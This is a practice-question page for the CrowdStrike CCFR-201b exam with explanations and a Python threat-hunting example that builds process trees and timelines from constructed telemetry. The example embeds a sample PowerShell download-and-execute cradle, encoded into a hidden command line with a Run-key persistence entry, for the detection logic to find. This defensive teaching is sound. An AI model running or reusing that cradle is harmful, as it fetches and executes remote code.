CCFR-201b Online Practice Questions


Latest CCFR-201b Exam Practice Questions

The practice questions for the CCFR-201b exam were last updated on 2026-02-24.

Question#1

What is an advantage of using a Process Timeline?

A. Process related events can be filtered to display specific event types
B. Suspicious processes are color-coded based on their frequency and legitimacy over time
C. Processes responsible for spikes in CPU performance are displayed overtime
D. A visual representation of Parent-Child and Sibling process relationships is provided

Explanation:
According to the CrowdStrike Falcon Devices Add-on for Splunk Installation and Configuration Guide v3.1.5+, the Process Timeline tool lets you view all cloudable events associated with a given process, such as process creation, network connections, file writes, registry modifications, and so on. You can also filter those events by various criteria, such as event type, timestamp range, file name, registry key, or network destination. This is the advantage of the Process Timeline (option A): it lets you focus on the specific events that are relevant to your investigation. Option D describes the Process Tree view, which shows parent, child, and sibling relationships, not the Process Timeline.

Question#2

Which of the following is NOT a category within the MITRE ATT&CK® Framework?

A. Initial Access
B. Execution
C. Detonation
D. Impact

Question#3

Which of the following is an example of a MITRE ATT&CK tactic?

A. Eternal Blue
B. Defense Evasion
C. Emotet
D. Phishing

Explanation:
According to the MITRE ATT&CK website, MITRE ATT&CK is a knowledge base of adversary behaviors and techniques based on real-world observations. The knowledge base is organized into tactics and techniques, where tactics are the high-level goals of an adversary, such as Initial Access, Persistence, and Lateral Movement, and techniques are the specific ways an adversary can achieve those goals, such as phishing, credential dumping, and remote file copy. Defense Evasion is one of the tactics defined by MITRE ATT&CK; it covers actions adversaries take to avoid detection or to prevent security controls from blocking their activity, so option B is correct. Phishing is a technique (T1566), not a tactic. EternalBlue is an exploit and Emotet is a malware family; ATT&CK records malware and tools in its Software catalog as things adversaries use to carry out techniques, and neither is a tactic.

Question#4

Which three use cases justify performing an Event Search in Falcon? (Choose three)

A. Identify process injection attempts
B. Track sensor update versions
C. Confirm unauthorized registry modifications
D. Validate command-line usage by PowerShell

Question#5

The __________ telemetry type records all parent-child process relationships and command-line arguments for launched executables.

A. File Activity
B. Registry Access
C. Process Execution
D. Network Connection
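The three questions above (Process Timeline filtering, Event Search use cases, and the process-execution telemetry that carries parent-child links and command lines) are easier to reason about with the data in hand. The following is an added example, not code from the page or from CrowdStrike: it builds a process tree and a filterable per-process timeline from constructed telemetry, then runs an Event-Search-style hunt for encoded PowerShell launched by an Office application. The field names (event_simpleName, TargetProcessId, ParentProcessId, ContextProcessId, CommandLine) follow the Falcon event schema as commonly documented, but every record, address and payload here is constructed for illustration.

```python
"""Toy model of a Falcon-style Process Tree, Process Timeline and Event Search hunt.
Added example: field names follow the Falcon event schema as commonly documented;
all records below are constructed, not real sensor output."""
import base64

# Assumed payload, encoded the way powershell.exe -EncodedCommand expects (base64 over
# UTF-16LE). Constructed for this example; the IP is a documentation address.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Constructed telemetry. ProcessRollup2 is the process-execution event: it carries the
# parent-child link and the command line. Other events name the acting process via
# ContextProcessId, which is how one process's timeline is stitched together.
EVENTS = [
    {"timestamp": 1, "event_simpleName": "ProcessRollup2", "TargetProcessId": 100,
     "ParentProcessId": 1, "FileName": "explorer.exe", "CommandLine": "explorer.exe"},
    {"timestamp": 2, "event_simpleName": "ProcessRollup2", "TargetProcessId": 200,
     "ParentProcessId": 100, "FileName": "WINWORD.EXE", "CommandLine": "WINWORD.EXE /n invoice.docm"},
    {"timestamp": 3, "event_simpleName": "ProcessRollup2", "TargetProcessId": 300,
     "ParentProcessId": 200, "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"timestamp": 4, "event_simpleName": "DnsRequest", "ContextProcessId": 300,
     "DomainName": "cdn.example.net"},
    {"timestamp": 5, "event_simpleName": "NetworkConnectIP4", "ContextProcessId": 300,
     "RemoteAddressIP4": "198.51.100.7", "RemotePort": 443},
    {"timestamp": 6, "event_simpleName": "AsepValueUpdate", "ContextProcessId": 300,
     "RegObjectName": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run",
     "RegValueName": "Updater"},
    {"timestamp": 7, "event_simpleName": "ProcessRollup2", "TargetProcessId": 400,
     "ParentProcessId": 100, "FileName": "cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]


def process_records(events):
    """Map each process id to its ProcessRollup2 (process-execution) record."""
    return {e["TargetProcessId"]: e for e in events if e["event_simpleName"] == "ProcessRollup2"}


def ancestry(events, pid):
    """Root-to-leaf image names for pid: one branch of the Process Tree view."""
    procs, chain = process_records(events), []
    while pid in procs:
        chain.append(procs[pid]["FileName"])
        pid = procs[pid]["ParentProcessId"]
    return list(reversed(chain))


def children(events, parent_pid):
    """Child pids of parent_pid in launch order; these are siblings of one another."""
    procs = process_records(events)
    return sorted((p for p, e in procs.items() if e["ParentProcessId"] == parent_pid),
                  key=lambda p: procs[p]["timestamp"])


def process_timeline(events, pid, event_types=None):
    """Time-ordered events created by or attributed to pid, optionally restricted to a
    set of event_simpleName values (the event-type filter the question refers to)."""
    rows = [e for e in events if pid in (e.get("TargetProcessId"), e.get("ContextProcessId"))]
    if event_types is not None:
        rows = [e for e in rows if e["event_simpleName"] in event_types]
    return sorted(rows, key=lambda e: e["timestamp"])


def decode_encoded_powershell(cmdline):
    """Plaintext of a -EncodedCommand argument, or None. powershell.exe accepts any
    unambiguous prefix of the parameter name (-e, -ec, -enc ...), so match on prefix."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and t[0] == "-" and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def hunt_encoded_powershell(events):
    """Event-Search-style hunt: PowerShell spawned by an Office app with an encoded
    command. Each finding carries the decoded payload, the ancestry, and any registry
    autostart writes, so the analyst can pivot straight into the process timeline."""
    procs, findings = process_records(events), []
    for pid, e in procs.items():
        parent = procs.get(e["ParentProcessId"])
        decoded = decode_encoded_powershell(e["CommandLine"])
        if (e["FileName"].lower() != "powershell.exe" or decoded is None
                or parent is None or parent["FileName"].lower() not in OFFICE_APPS):
            continue
        reg = [r["RegObjectName"] for r in process_timeline(events, pid, {"AsepValueUpdate"})]
        findings.append({"pid": pid, "ancestry": ancestry(events, pid),
                         "decoded": decoded, "registry_writes": reg})
    return findings


if __name__ == "__main__":
    for f in hunt_encoded_powershell(EVENTS):
        print(" > ".join(f["ancestry"]), "::", f["decoded"])
        for e in process_timeline(EVENTS, f["pid"]):
            print("  ", e["timestamp"], e["event_simpleName"])
```

Running the script prints the ancestry explorer.exe > WINWORD.EXE > powershell.exe, the decoded download cradle, and the four timeline events for the PowerShell process. The hunt keys on the parent-child link and the command line from the process-execution event, which is exactly why that telemetry type matters more than file, registry or network events alone for the question above.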

Disclaimer

This page is for educational and exam preparation reference only. It is not affiliated with CrowdStrike, CCFR, or the official exam provider. Candidates should refer to official documentation and training for authoritative information.

Exam Code: CCFR-201b | Q&A: 341 Q&As | Updated: 2026-02-24